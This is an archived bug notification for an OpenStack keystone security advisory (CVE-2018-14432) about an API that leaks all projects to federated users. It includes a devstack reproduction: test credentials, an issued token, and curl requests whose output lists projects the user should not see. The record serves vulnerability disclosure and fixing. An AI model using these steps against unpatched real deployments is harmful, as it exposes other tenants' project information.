yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #73976
[Bug 1779205] Re: [OSSA-2018-002] GET /v3/OS-FEDERATION/projects leaks project information (CVE-2018-14432)
** Changed in: ossa
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Identity (keystone).
https://bugs.launchpad.net/bugs/1779205
Title:
[OSSA-2018-002] GET /v3/OS-FEDERATION/projects leaks project
information (CVE-2018-14432)
Status in OpenStack Identity (keystone):
Fix Released
Status in OpenStack Security Advisory:
Fix Released
Bug description:
The /v3/OS-FEDERATION/projects API was developed to let federated
users discover what projects they have access to. This mirrored a
similar API in keystone, v3/auth/projects. Both were intended to
behave the same way, by only returning what projects a user has a role
assignment on.
Eventually the /v3/OS-FEDERATION/projects API was deprecated after the
/v3/auth/projects API was able to support federated tokens.
The /v3/OS-FEDERATION/projects API appears to be broken because it
returns all projects in the deployment, not just the ones a user has
access to. The following recreates the issue:
lbragstad|devstack|~ >>> cat /etc/openstack/clouds.yaml
clouds:
devstack:
auth:
auth_url: http://192.168.1.5/identity
password: nomoresecret
project_domain_id: default
project_name: demo
user_domain_id: default
username: demo
identity_api_version: '3'
region_name: RegionOne
volume_api_version: '2'
devstack-admin:
auth:
auth_url: http://192.168.1.5/identity
password: nomoresecret
project_domain_id: default
project_name: admin
user_domain_id: default
username: admin
identity_api_version: '3'
region_name: RegionOne
volume_api_version: '2'
devstack-alt:
auth:
auth_url: http://192.168.1.5/identity
password: nomoresecret
project_domain_id: default
project_name: alt_demo
user_domain_id: default
username: alt_demo
identity_api_version: '3'
region_name: RegionOne
volume_api_version: '2'
lbragstad|devstack|~ >>> openstack role assignment list --names --os-cloud devstack-admin
+-------------+------------------+-------------------+----------------------------+---------+-----------+
| Role | User | Group | Project | Domain | Inherited |
+-------------+------------------+-------------------+----------------------------+---------+-----------+
| member | | nonadmins@Default | demo@Default | | False |
| anotherrole | | nonadmins@Default | demo@Default | | False |
| member | | nonadmins@Default | alt_demo@Default | | False |
| anotherrole | | nonadmins@Default | alt_demo@Default | | False |
| admin | | admins@Default | admin@Default | | False |
| admin | admin@Default | | demo@Default | | False |
| admin | admin@Default | | admin@Default | | False |
| admin | admin@Default | | alt_demo@Default | | False |
| admin | admin@Default | | | Default | False |
| member | demo@Default | | demo@Default | | False |
| anotherrole | demo@Default | | demo@Default | | False |
| member | demo@Default | | invisible_to_admin@Default | | False |
| member | alt_demo@Default | | alt_demo@Default | | False |
| anotherrole | alt_demo@Default | | alt_demo@Default | | False |
| admin | admin@Default | | | | False |
+-------------+------------------+-------------------+----------------------------+---------+-----------+
lbragstad|devstack|~ >>> openstack token issue --os-cloud devstack
+------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| expires | 2018-06-28T21:03:47+0000 |
| id | gAAAAABbNT8jpqwHC_ZeIQvo3YBIvp0UxletD5d0xZ7BFbuNbNGminfpp0FtG5RYZgIIIW4i8OOMtYnmDtQ1b4FOGLzFexayG5D3gTTrDBvQAFy95gQiaSxxJGsscCQ36pxiFWxqA0KBzvdCMPDpYDtuG1pd0b3KiskApbVcwE-uuESisyzj36w |
| project_id | 44053df0d12f4ba0aa4c28c3364aa1a1 |
| user_id | cef2773684114d55a6399e928ecc78e4 |
+------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
lbragstad|devstack|~ >>> export TOKEN='gAAAAABbNT8jpqwHC_ZeIQvo3YBIvp0UxletD5d0xZ7BFbuNbNGminfpp0FtG5RYZgIIIW4i8OOMtYnmDtQ1b4FOGLzFexayG5D3gTTrDBvQAFy95gQiaSxxJGsscCQ36pxiFWxqA0KBzvdCMPDpYDtuG1pd0b3KiskApbVcwE-
uuESisyzj36w'
lbragstad|devstack|~ >>> curl -H "X-Auth-Token: $TOKEN" http://localhost/identity/v3/auth/projects | python -m json.tool
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 669 100 669 0 0 20476 0 --:--:-- --:--:-- --:--:-- 20906
{
"links": {
"next": null,
"previous": null,
"self": "http://192.168.1.5/identity/v3/auth/projects";
},
"projects": [
{
"description": "",
"domain_id": "default",
"enabled": true,
"id": "44053df0d12f4ba0aa4c28c3364aa1a1",
"is_domain": false,
"links": {
"self": "http://192.168.1.5/identity/v3/projects/44053df0d12f4ba0aa4c28c3364aa1a1";
},
"name": "demo",
"parent_id": "default",
"tags": []
},
{
"description": "",
"domain_id": "default",
"enabled": true,
"id": "8c92de6ab3884f94b508ce2f2dd62c4d",
"is_domain": false,
"links": {
"self": "http://192.168.1.5/identity/v3/projects/8c92de6ab3884f94b508ce2f2dd62c4d";
},
"name": "invisible_to_admin",
"parent_id": "default",
"tags": []
}
]
}
lbragstad|devstack|~ >>> curl -H "X-Auth-Token: $TOKEN" http://localhost/identity/v3/OS-FEDERATION/projects | python -m json.tool
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1270 100 1270 0 0 17528 0 --:--:-- --:--:-- --:--:-- 17638
{
"links": {
"next": null,
"previous": null,
"self": "http://192.168.1.5/identity/v3/OS-FEDERATION/projects";
},
"projects": [
{
"description": "",
"domain_id": "default",
"enabled": true,
"id": "44053df0d12f4ba0aa4c28c3364aa1a1",
"is_domain": false,
"links": {
"self": "http://192.168.1.5/identity/v3/projects/44053df0d12f4ba0aa4c28c3364aa1a1";
},
"name": "demo",
"parent_id": "default",
"tags": []
},
{
"description": "Bootstrap project for initializing the cloud.",
"domain_id": "default",
"enabled": true,
"id": "681b94352ed146b5ac37c152653e90d2",
"is_domain": false,
"links": {
"self": "http://192.168.1.5/identity/v3/projects/681b94352ed146b5ac37c152653e90d2";
},
"name": "admin",
"parent_id": "default",
"tags": []
},
{
"description": "",
"domain_id": "default",
"enabled": true,
"id": "9a742b4684dc4c8a90dc4896f9ab178e",
"is_domain": false,
"links": {
"self": "http://192.168.1.5/identity/v3/projects/9a742b4684dc4c8a90dc4896f9ab178e";
},
"name": "alt_demo",
"parent_id": "default",
"tags": []
},
{
"description": "",
"domain_id": "default",
"enabled": true,
"id": "8c92de6ab3884f94b508ce2f2dd62c4d",
"is_domain": false,
"links": {
"self": "http://192.168.1.5/identity/v3/projects/8c92de6ab3884f94b508ce2f2dd62c4d";
},
"name": "invisible_to_admin",
"parent_id": "default",
"tags": []
}
]
}
Notice that I used the devstack cloud config, which specifies the demo
user who only has the `member` and `anotherrole` assigned on two
projects (demo and invisible_to_admin). In no way should they have
access to view all projects in the deployment.
To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1779205/+subscriptions
